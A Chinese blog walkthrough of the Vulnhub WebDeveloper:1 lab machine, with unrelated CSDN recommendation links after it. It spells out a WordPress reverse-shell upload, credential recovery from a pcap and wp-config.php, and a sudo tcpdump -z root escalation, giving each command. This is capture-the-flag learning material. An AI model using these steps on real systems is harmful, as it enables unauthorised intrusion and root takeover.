WebDeveloper:1靶机

于 2024-08-12 18:44:06 发布
阅读量227 收藏 5
点赞数 3
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/141139200
版权

信息收集

靶机扫描

nmap 192.168.93.0/24

端口开放22、80

进行目录扫描,发现ipdata目录

进入该目录发现一个流量包,下载使用wireshark打开

查看后发现wordpress后台用户密码:webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接/wp-admin

用找到的用户名密码登录wordpress,登录成功

利用wordpress的上传theme功能getshell

在下处发现一处文件上传页面

获取shell

把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)

直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。

尝试访问扫描结果之后发现,上传的反弹shell在wp-content/uploads/ 目录的子目录下

进行反弹监听

输入以下命令得到交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

用linpeas.sh找到webdeveloper用户账号密码

进入到/var/www/html/wp-config.php,找到数据库wordpress的用户名和密码webdeveloper : MasterOfTheUniverse

尝试用这个账户密码进行ssh登录

ssh webdeveloper@192.168.93.166

提权

首先,输入如下命令查找php-reverse-shell.php的位置

find / -name php-reverse-shell.php 2>/dev/null

找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php

然后输入以下命令

COMMAND='php /var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

攻击机监听的2333端口下出现root用户的反弹shell

陽陽yy
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
coursera-webDeveloper:Coursera测试库
02-16
每个标签都有其特定的含义,比如`<h1>`用于创建一级标题,`<p>`用于创建段落。 在`coursera-web...通过分析和实践`coursera-webDeveloper-main`中的文件,学生可以深化理解这些概念,并提升自己的Web开发技能。
web-developer:网站开发者
03-28
Web开发人员 网站开发者
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 207
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
【vulnhub】WebDeveloper:1靶机
wbplife的博客
08-11 317
把kali linux自带的php反弹shell代码(/usr/share/webshells/php/php-reverse-shell.php)直接把/usr/share/webshells/php/php-reverse-shell.php改一下$ip和$port,保存,并上传。找到其位置在/var/www/html/wp-content/uploads/2022/01/php-reverse-shell.php。首先,输入如下命令查找php-reverse-shell.php的位置。
【Vulnhub靶机WEB DEVELOPER: 1
所有文章均免费阅读,大家一起学习
07-04 274
然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php。将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码。结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了。用找到的用户名密码登录wordpress,登录成功。查看webdeveloper用户的sudo命令\。查看一下网站根目录下面的文件。发现开放的端口有22 80。
vulnhub Web Developer: 1
箭雨镜屋
01-02 1920
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
WEB-developer:一些实验项目
05-22
【压缩包子文件的文件名称列表】:WEB-developer-main "WEB-developer-main"很可能是一个包含所有项目文件的主目录,其中可能有HTML文件(.html)、CSS文件(.css)、JavaScript文件(.js)以及可能的图像和其他...
Web Developer 0.5.4.zip
09-13
标题 "Web Developer 0.5.4.zip" 暗示了这是一个针对Web开发者设计的工具,具体来说,它是一个浏览器扩展程序。该版本为0.5.4,表明它是软件的某个更新版本,可能包含了错误修复、新功能或者性能改进。 描述中提到...
developer:BKSS 项目开发中
06-12
1. **Java编程**:包括基本语法、类、对象、接口、异常处理、集合框架、多线程、网络编程等方面。 2. **MVC架构**:如果项目涉及Web开发,可能会使用Model-View-Controller架构来组织代码。 3. **开发工具**:如...
C++笔记5•内存管理•
qq_64446190的博客
08-12 687
内存管理
第二十五天培训笔记
最新发布
weixin_70756988的博客
08-12 249
选项表示将所有的依赖和代码打包到一个单独的文件中,这样生成的可执行文件更便于。、设置清华镜像站(从国内下载安装包,提高下载和安装工具速度)文件夹中找到生成的可执行文件。可以将这个可执行文件拷贝。在不替换原有代码的情况下,应对数据库软件的升级)到其他机器上(即使该机器没有安装 Python。数据框架,用于保存从数据库中读取的数据)的工具,通过这个工具,就可以。上面命令执行失败:执行该命令。完成打包后,会在当前目录的。)修改为清华大学的镜像源。有完整的读取数据的工具,是知名的数据分析工具,
Linux源码阅读笔记20-PCI设备驱动详解
Lenn Louis' Scribe
08-08 393
【代码】Linux源码阅读笔记20-PCI设备驱动详解。
网络安全自学笔记
2301_77160226的博客
08-07 1096
网络安全是指保护网络系统中的硬件、软件及其数据不因偶然或恶意的原因而遭到破坏、更改、泄露,保障系统连续可靠正常地运行,网络服务不中断。网络安全涵盖了众多方面,包括但不限于保护个人隐私、防止商业机密泄露、维护国家安全等。在当今数字化时代,几乎所有的信息交流和业务活动都依赖于网络,因此网络安全的重要性日益凸显。通过搭建实验环境,如使用虚拟机搭建一个包含服务器和客户端的网络,模拟各种网络攻击和防护场景,如进行 SQL 注入攻击的尝试,并实施相应的防护措施,如安装防火墙、使用加密技术等。
MongoDB学习笔记(三)
2303_76234920的博客
08-08 233
使用Python操作MongoDB:使用管理员用户:
江科大/江协科技 STM32学习笔记P21
sususu_2001的博客
08-08 1106
有ADC也有DAC数字模拟转换器,使用DAC可以将数字变量转化为模拟电压,与PWM相比较,PWM也有DAC的功能,同时PWM只有完全导通和完全断开两种状态,没有功率损耗,在直流电机调速这种大功率的应用场景使用PWM来等效模拟量比DAC更好。DAC的应用主要在波形生成,比如信号发生器、音频解码芯片等。AD转换需要花一小段时间,1us表示从AD转换开始到产生结果需要1us,对应AD转换的频率就是1MHz,是STM32ADC的最快转换频率。
sheng的学习笔记-AI-k近邻学习(kNN)
coldstarry的专栏
08-07 495
k近邻(k-Nearest Neighbor,简称kNN)学习是一种常用的监督学习方法,是一种基本的分类与回归方法。分类问题:对新的样本,根据其 k 个最近邻的训练样本的类别,通过多数表决等方式进行预测。回归问题:对新的样本,根据其 k 个最近邻的训练样本标签值的均值作为预测值。
16、电科院FTU检测标准学习笔记-基本性能2
sixtome
08-10 1063
作者简介:本人从事电力系统多年,岗位包含研发,测试,工程等,具有丰富的经验在配电自动化验收测试以及电科院测试中,本人全程参与,积累了不少现场的经验。
JUC并发编程与源码分析学习笔记(三)
xizheng2018的博客
08-09 194
ThreadLocal 该类提供线程局部变量1、ThreadLocal简介①、大厂面试题②、是什么?③、能干嘛?④、方法摘要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值